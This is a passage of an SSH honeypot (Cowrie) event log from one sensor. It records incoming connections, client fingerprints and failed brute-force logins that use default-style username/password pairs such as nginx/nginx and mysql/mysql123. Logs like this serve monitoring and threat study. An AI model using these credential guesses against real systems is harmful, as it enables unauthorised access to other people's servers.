{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:28:34.673736Z","src_ip":"212.227.235.229","session":"8f48982c6f84"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:28:35.941563Z","src_ip":"212.227.125.160","session":"d77666a2b6ce"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx","message":"login attempt [nginx/nginx] failed","sensor":"my-vps","timestamp":"2025-08-31T02:28:39.744794Z","src_ip":"212.227.125.160","session":"ca575cce2058"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":36920,"dst_ip":"1.2.3.4","dst_port":22,"session":"76e4e26befaf","protocol":"ssh","message":"New connection: 41.226.27.251:36920 (1.2.3.4:22) [session: 76e4e26befaf]","sensor":"my-vps","timestamp":"2025-08-31T02:28:44.294299Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:28:44.295400Z","src_ip":"41.226.27.251","session":"76e4e26befaf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:28:44.337785Z","src_ip":"41.226.27.251","session":"76e4e26befaf"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123","message":"login attempt [app/app123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:28:44.467221Z","src_ip":"41.226.27.251","session":"76e4e26befaf"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:28:45.703008Z","src_ip":"41.226.27.251","session":"76e4e26befaf"}
{"eventid":"cowrie.session.closed","duration":"67.8","message":"Connection lost after 67.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:28:48.283049Z","src_ip":"212.227.125.160","session":"ca575cce2058"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51952,"dst_ip":"1.2.3.4","dst_port":22,"session":"970323f23cff","protocol":"ssh","message":"New connection: 217.72.205.35:51952 (1.2.3.4:22) [session: 970323f23cff]","sensor":"my-vps","timestamp":"2025-08-31T02:28:51.410233Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:28:51.411533Z","src_ip":"217.72.205.35","session":"970323f23cff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60176,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d747a446bf9","protocol":"ssh","message":"New connection: 212.227.125.160:60176 (1.2.3.4:22) [session: 9d747a446bf9]","sensor":"my-vps","timestamp":"2025-08-31T02:28:51.713025Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":38002,"dst_ip":"1.2.3.4","dst_port":22,"session":"918c225d6a64","protocol":"ssh","message":"New connection: 41.226.27.251:38002 (1.2.3.4:22) [session: 918c225d6a64]","sensor":"my-vps","timestamp":"2025-08-31T02:29:04.701984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:29:04.748810Z","src_ip":"41.226.27.251","session":"918c225d6a64"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:29:04.749885Z","src_ip":"41.226.27.251","session":"918c225d6a64"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools","message":"login attempt [tools/tools] failed","sensor":"my-vps","timestamp":"2025-08-31T02:29:04.921772Z","src_ip":"41.226.27.251","session":"918c225d6a64"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:29:06.148398Z","src_ip":"41.226.27.251","session":"918c225d6a64"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59812,"dst_ip":"1.2.3.4","dst_port":22,"session":"b93387c18f06","protocol":"ssh","message":"New connection: 212.227.235.229:59812 (1.2.3.4:22) [session: b93387c18f06]","sensor":"my-vps","timestamp":"2025-08-31T02:29:10.250820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:29:11.026438Z","src_ip":"212.227.235.229","session":"b93387c18f06"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:29:11.027242Z","src_ip":"212.227.235.229","session":"b93387c18f06"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"abc123","message":"login attempt [elasticsearch/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:29:17.089324Z","src_ip":"212.227.235.229","session":"b93387c18f06"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:29:18.882595Z","src_ip":"212.227.235.229","session":"b93387c18f06"}
{"eventid":"cowrie.session.closed","duration":"28.9","message":"Connection lost after 28.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:29:20.596651Z","src_ip":"212.227.125.160","session":"9d747a446bf9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60866,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7b38a67a925","protocol":"ssh","message":"New connection: 212.227.235.229:60866 (1.2.3.4:22) [session: f7b38a67a925]","sensor":"my-vps","timestamp":"2025-08-31T02:29:24.404977Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":36604,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b957759f4c4","protocol":"ssh","message":"New connection: 41.226.27.251:36604 (1.2.3.4:22) [session: 2b957759f4c4]","sensor":"my-vps","timestamp":"2025-08-31T02:29:24.852825Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:29:24.905118Z","src_ip":"41.226.27.251","session":"2b957759f4c4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:29:24.906105Z","src_ip":"41.226.27.251","session":"2b957759f4c4"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse123","message":"login attempt [lighthouse/lighthouse123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:29:25.099328Z","src_ip":"41.226.27.251","session":"2b957759f4c4"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:29:26.524035Z","src_ip":"41.226.27.251","session":"2b957759f4c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50336,"dst_ip":"1.2.3.4","dst_port":22,"session":"b057ff667dc8","protocol":"ssh","message":"New connection: 212.227.125.160:50336 (1.2.3.4:22) [session: b057ff667dc8]","sensor":"my-vps","timestamp":"2025-08-31T02:29:31.892603Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:29:32.467325Z","src_ip":"212.227.125.160","session":"b057ff667dc8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:29:32.468874Z","src_ip":"212.227.125.160","session":"b057ff667dc8"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx","message":"login attempt [nginx/nginx] failed","sensor":"my-vps","timestamp":"2025-08-31T02:29:33.512907Z","src_ip":"212.227.235.229","session":"8f48982c6f84"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"abc123","message":"login attempt [elasticsearch/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:29:35.037320Z","src_ip":"212.227.125.160","session":"b057ff667dc8"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:29:36.556528Z","src_ip":"212.227.125.160","session":"b057ff667dc8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:29:40.094217Z","src_ip":"212.227.235.229","session":"f7b38a67a925"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:29:40.095043Z","src_ip":"212.227.235.229","session":"f7b38a67a925"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":48874,"dst_ip":"1.2.3.4","dst_port":22,"session":"d27515dbf759","protocol":"ssh","message":"New connection: 80.94.95.15:48874 (1.2.3.4:22) [session: d27515dbf759]","sensor":"my-vps","timestamp":"2025-08-31T02:29:44.118392Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T02:29:44.119255Z","src_ip":"80.94.95.15","session":"d27515dbf759"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T02:29:44.170687Z","src_ip":"80.94.95.15","session":"d27515dbf759"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T02:29:44.456084Z","src_ip":"80.94.95.15","session":"d27515dbf759"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":53210,"dst_ip":"1.2.3.4","dst_port":22,"session":"14fa19c0aca0","protocol":"ssh","message":"New connection: 41.226.27.251:53210 (1.2.3.4:22) [session: 14fa19c0aca0]","sensor":"my-vps","timestamp":"2025-08-31T02:29:45.356757Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:29:45.357870Z","src_ip":"41.226.27.251","session":"14fa19c0aca0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:29:45.401874Z","src_ip":"41.226.27.251","session":"14fa19c0aca0"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:29:45.509157Z","src_ip":"80.94.95.15","session":"d27515dbf759"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql123","message":"login attempt [mysql/mysql123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:29:45.535116Z","src_ip":"41.226.27.251","session":"14fa19c0aca0"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:29:46.725014Z","src_ip":"41.226.27.251","session":"14fa19c0aca0"}
{"eventid":"cowrie.session.closed","duration":"83.0","message":"Connection lost after 83.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:29:46.893799Z","src_ip":"212.227.235.229","session":"8f48982c6f84"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":35498,"dst_ip":"1.2.3.4","dst_port":22,"session":"ccbf351000ae","protocol":"ssh","message":"New connection: 41.226.27.251:35498 (1.2.3.4:22) [session: ccbf351000ae]","sensor":"my-vps","timestamp":"2025-08-31T02:30:05.914828Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:30:05.915884Z","src_ip":"41.226.27.251","session":"ccbf351000ae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 